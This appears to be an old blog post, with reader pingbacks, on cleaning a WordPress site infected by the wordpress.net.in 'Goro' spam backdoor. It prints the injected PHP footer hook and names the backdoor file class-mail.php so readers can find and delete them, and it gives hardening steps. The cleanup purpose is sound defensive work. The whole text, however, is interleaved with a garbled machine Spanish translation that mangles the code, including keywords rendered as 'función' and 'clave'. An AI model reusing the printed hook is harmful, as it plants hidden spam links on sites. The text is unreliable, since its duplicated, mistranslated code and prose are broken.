I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in). He encontrado este durante la navegación WordPress foro de soporte, algunas de estas víctimas actualizar sus default_filters.php y subir de clase-mail.php dentro de sus WordPress sin ser consciente de que es una puerta trasera (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php . No hay clase-mail.php WordPress excepto en clase-phpmailer.php. So don’t get confuse by it. Por lo tanto, no se confundan por el mismo.
Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes. A continuación se presenta una rápida solución sobre cómo puede eliminarse el infractor Goro spamware inyección antes de que Google prohibido de las tuberías de Internet.
Workaround Solución
- For temporary disable remote include in php.ini settings. Para desactivar temporalmente a distancia incluyen la configuración en php.ini.
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;;; Fopen wrappers; ;;;;;;;;;;;;;;;;;;; para permitir o no el tratamiento de URL (como http:// o ftp://) como archivos. allow_url_fopen = off allow_url_include = off allow_url_fopen = off allow_url_include = off
- Check your .htaccess for suspicious redirect. Chequea tu. Htaccess para redirigir sospechosas.
- Find class-mail.php inside “*/wp-includes/” directory and removed it. Encuentra clase-mail.php dentro "* / wp-includes /" directorio y lo borré.
- Find the following code inside “*/wp-includes/default_filters.php” and removed it Encuentra el siguiente código dentro de "* / wp-includes/default_filters.php" y lo borré
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( 'wp_footer', 'wpc7c16b8466d864eeefd20050625c7775'); función wpc7c16 <> b8466d864eeefd20050625c7775 () (@ include ( '. / wp-includes / class-mail.php'); if (sizeof ($ wparr)> 0) (echo " ! div id = \ "Goro \"! "; foreach ($ wparr como $ k => $ v) (echo" ". ucwords ($ v [ 'clave'])." \ n"; if ($ i = = $ inum) break;) echo "! / div !".$_ pie de página;)) Robots.txt Exclusion La exclusión robots.txt
Optional - Prevent googlebot from indexing the static spam page. Opcional - evitar que Googlebot indexación de la página estática spam.
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Ingresar a Wordpress administrador> Administrar> Archivos> Otros archivos → clave en "Robots.txt". Add the following code. Añadir el siguiente código.User-agent: Googlebot Disallow: /*?* Disallow: /*? User-agent: Googlebot Disallow: / * * Disallow: / *?Refer robots.txt . Consulte el archivo robots.txt.
Possible WordPress class (suspicious) files that would be tempered Posibles WordPress clase (sospechosas) los archivos que se templado
Md5 checksum the following files, compare it with official versions from WordPress Release Archive . Suma de control MD5 en los siguientes ficheros, compararla con las versiones oficiales de WordPress Release Archive.
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Los métodos anteriores sólo eliminar los discapacitados y los spams vínculos, no hay garantía de que se le protege de futuras vulnerabilidades. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade . Copia de seguridad (o su posterior exportación mediante WordPress RSS-eXtended WRX) y realizar una completa actualización.
- Dec 13, 2007 13-dic-2007
I just notice this recently. Acabo de este anuncio recientemente. You’ll need to check your site HTTP Header. Usted tendrá que comprobar su sitio de cabecera HTTP. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) . La mayoría de los secuestrados páginas web no respuesta correcta con el Estado de cabecera HTTP (400 <> 500). My guess is they did this to cloak from being crawl by search engine spiders. Mi adivinar es que hicieron a este manto de ser rastreo de las arañas de los motores de búsqueda. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner . Si usted ha limpiado todos los archivos infectados y su cabecera no respuesta correcta obtener un rookit escáner.
Check your website status header, try cloak your browser (UA) as Search Engine Crawler. Revise su página web la condición de cabecera, intente encubrir su navegador (UA) como rastreadores de motores de búsqueda. The following screenshot will show you how to setup this at web-sniffer.net. La siguiente captura de pantalla le mostrará cómo configurar esta en la web sniffer.net.
This methods may not work if the cloaking scripts used IP base tracking. Esta métodos puede no funcionar si el encubrimiento scripts base utilizado IP de seguimiento. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). Por lo tanto, tratar a diferentes cadenas agente de usuario (es decir: inoktomi, askjeeves, ia_archiver).
Firefox Browser Navegador Firefox
You can also override your useragent string with firefox ↓. También puede anular su cadena de usuario con firefox ↓.
about:config → general.useragent.overide = ‘ ua strings ‘ about: config → general.useragent.overide = 'ua cuerdas'
Wordpress.net.in Backdoor Wordpress.net.in Backdoor
Wordpress.net.in Doorway Wordpress.net.in Doorway
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ Diciembre 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files Backdoor Archivos
inside wp-includes directory. dentro de wp-incluye directorio.
- compat.php - (replace with latest version) compat.php - (sustituir con versión más reciente)
- class-mail.php delete clase-mail.php borrar
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins . exploración y elimina todos los archivos de puerta trasera y crear un archivo. htaccess archivo dentro de wp-incluye & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index). A continuación, añada el siguiente código para discapacitados listado de directorio (evitar fugas de información y Directorio índice de búsqueda).
Options -Indexes Opciones-Índices Wordpress.net.in New Partner Wordpress.net.in nuevo socio
Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 23 de Febrero de 2008, hemos encontrado una firma similar a como wordpress.net.in qwetro.com (alemania). Probably from the same attacker with different agenda. Probablemente a partir de la misma atacante con agenda diferente.
Related Posts Puestos relacionados
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) Bluehost HostMonster CEO's Blog hackeado (wordpress.net.in)
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II Matt Heaton Bluehost Hostmonster CEO's hackeado de nuevo - la huelga II
External Links Enlaces externos
- Websniffer View HTTP Request and Response Header Ver Websniffer petición HTTP y la respuesta Header
- Wordpress Support Forum Wordpress foro de soporte
- National Vulnerability Database Wordpress 2.0 > 2.0.6 Base de Datos Nacional de la vulnerabilidad de Wordpress 2,0> 2.0.6
16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16 Respuestas a "Cómo eliminar el spam Wordpress.net.in inyección"
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [...] Na enak problema, o vendar? Itno Jih je zelo malo rešilo VSE skupaj. Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] Ampak Google dela? Udeže: ¿Cómo ha eliminado Wordpress.net.in Spam de inyección infectados por 'Goro' Spam clase-mail.php Backdoor En rešitev je [...]
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [...] He encontrar alguna información útil sobre la forma de limpiar el lío que Kakkoi: ¿Cómo ha eliminado Wordpress.net.in Spam inyección. [...]
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Wordpress.net.in puso de manifiesto una serie de páginas, incluyendo una entrada de blog de Avice De'vereux que describe los síntomas y dijeron que fueron causadas por una inyección de spam por secuestrar [...]
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Es lo que Gordon Dewis Descubierto: Google wordpress.net.in puso de manifiesto una serie de páginas, incluyendo una entrada de blog de Avice De'vereux que describe los síntomas y dijeron que fueron causadas por una inyección de spam por secuestrar [.. .]
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...] [...] Me lleva a Avice perfectamente maravillosa vida después de ahorro, donde se instruye la manera de eliminar [...]
[...] en is alle gehackte code gevonden. [...] Es en alle gehackte código gevonden. Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. Mocht je último hebben van de div id = "Goro" hack kijk dan eens hier voor handige tips voor het verwijderen. Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...] Alhoewel ik geen voorlopig PC klusjes Zou doen gaan que toch [...]
I got hacked to, mine was spam links to Me ha hackeado a, la mía es spam enlaces a
donaldsensing.com:6666 donaldsensing.com: 6666[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...] [...] Relacionado: Blogs tomar el centro del escenario para los comercializadores y de cómo Google para eliminar el spam Wordpress.net.in inyección [...]
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name. No estoy seguro de que es "alxumuk" verdadero nombre es, pero hay un editor en DMOZ con similar nombre.
Lack Resources Falta de RecursosATM I only have a few raw accesslog from Murray's blog & Jens's blog . Matt Heaton never replies. ATM sólo tengo unos crudo accesslog de Murray en el blog y el blog de Jens. Matt Heaton nunca respuestas.
I hope that Mr. Goro got careless and show his footprint, I need more raw access log. Espero que el señor Goro se muestran negligentes y su huella, necesito más cruda registro de acceso. Send it to my email Enviar a mi correo electrónico
[...] might go Here to learn the way to remove the Spam [...] [...] Aquí puede ir a aprender la manera de eliminar el Spam [...]
Co-Founder of Mozilla Project WordPress Blog's Hacked... Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer. Co-Fundador del Proyecto Mozilla WordPress Blog's hackeado ... Blake Ross, el Co-Fundador del Proyecto Mozilla WordPress Blog's hackeado por Wordpress.net.in Blackhat Spammer. ......
[...] het te maken had met spam injection hijack by wordpress.net.in. [...] Het te maken se había reunido spam inyección de secuestrar wordpress.net.in. Meer info over het probleem kan je hier vinden. Meer info sobre het probleem kan je hier vinden. De eenvoudigste oplossing voor het probleem, is een nieuwe versie van wordpress erop [...] De eenvoudigste oplossing voor het probleem, es een nieuwe versie van wordpress erop [...]